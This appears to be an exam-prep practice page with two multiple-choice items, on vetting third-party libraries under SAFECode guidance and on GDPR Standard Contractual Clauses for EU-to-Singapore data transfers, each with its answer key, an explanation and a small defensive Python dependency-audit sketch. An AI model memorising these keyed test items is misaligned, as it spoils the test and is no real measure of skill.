Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is the OWASP Software Assurance Maturity Model (SAMM)?
Why is a baseline self-assessment critical in SAMM?
How does SAMM differ from automated tools like SAST?
During sprint planning, a development team wants to pull several open-source libraries from a public repository to speed delivery of a payment module. Based on SAFECode software assurance best-practice guidance, which approach most effectively reduces the risk of introducing insecure or malicious third-party components?
Pin each dependency to a specific version in the build script so the code base never changes without explicit developer action.
Select only the most downloaded libraries in the repository, assuming high adoption indicates stronger community vetting.
Scan every candidate library for known vulnerabilities and maintain ongoing monitoring and re-assessment as part of the project's secure supply-chain process.
Require that all third-party libraries carry an open-source license so their source code can be inspected if problems arise.
Answer Description
SAFECode recommends that organizations adopt a structured process for selecting and managing third-party software. This includes performing security scans of each component for known vulnerabilities before use, approving them through a defined governance process, and continuously monitoring them for newly disclosed issues during the product lifecycle. Simply locking versions, trusting popularity, or relying on open-source licensing alone does not adequately address hidden vulnerabilities or malicious code that may surface after initial selection.
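The "scan before use, then keep monitoring" step can be illustrated with a small audit sketch. The advisory data below is entirely made up for illustration; a real pipeline would query a live vulnerability feed such as OSV or the NVD, and the library names and CVE identifiers here are hypothetical.

```python
# Hypothetical advisory data; a real process would pull fresh data
# from a vulnerability feed on every build, not a static table.
KNOWN_VULNS = {
    ("paylib", "1.2.0"): ["CVE-2024-0001"],
}

def parse_requirements(text: str) -> list[tuple[str, str]]:
    """Parse simple 'name==version' pinned-dependency lines."""
    deps = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, version = line.partition("==")
        deps.append((name, version))
    return deps

def audit(deps: list[tuple[str, str]], advisories: dict) -> dict:
    """Return the subset of dependencies with known advisories.
    Run at selection time and again on every re-assessment, since
    new issues are disclosed after a component is approved."""
    findings = {}
    for name, version in deps:
        vulns = advisories.get((name, version))
        if vulns:
            findings[(name, version)] = vulns
    return findings
```

Version pinning (the first distractor) is a useful complement, because it makes the audited artifact reproducible, but as the answer notes it does nothing by itself about vulnerabilities already present in the pinned version.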
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is SAFECode, and why is it important in software assurance?
Why is scanning and monitoring third-party libraries necessary?
Why isn’t pinning dependency versions or relying on popularity enough to ensure security?
Your development team is drafting requirements for a new analytics microservice that will replicate EU customer profiles to a cloud region in Singapore. Which requirement best addresses cross-border privacy obligations that apply to this data movement?
Conclude Standard Contractual Clauses with the cloud host before exporting personal data.
Store the replica as compressed, read-only snapshots retained for five years.
Encrypt replicated tables with AES-256 and manage keys in a hardware security module.
Send replication traffic over a private dedicated inter-region link controlled by the CSP.
Answer Description
Under GDPR, exporting personal data outside the European Economic Area is lawful only when an adequate transfer mechanism is in place. Standard Contractual Clauses (SCCs) are one of the primary mechanisms allowed by Article 46 and must be executed with the recipient before any transfer occurs. While encryption, private links, and snapshot retention improve security or operational efficiency, none of them on their own satisfy the legal requirement for an appropriate international-transfer safeguard. Therefore, concluding SCCs with the cloud provider is the most appropriate privacy requirement.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What are Standard Contractual Clauses (SCCs) under GDPR?
Why is AES-256 encryption insufficient for cross-border data transfers under GDPR?
What is meant by an 'adequate transfer mechanism' under GDPR?
That's It!
Looks like that's it! You can go back and review your answers or click the button below to grade your test.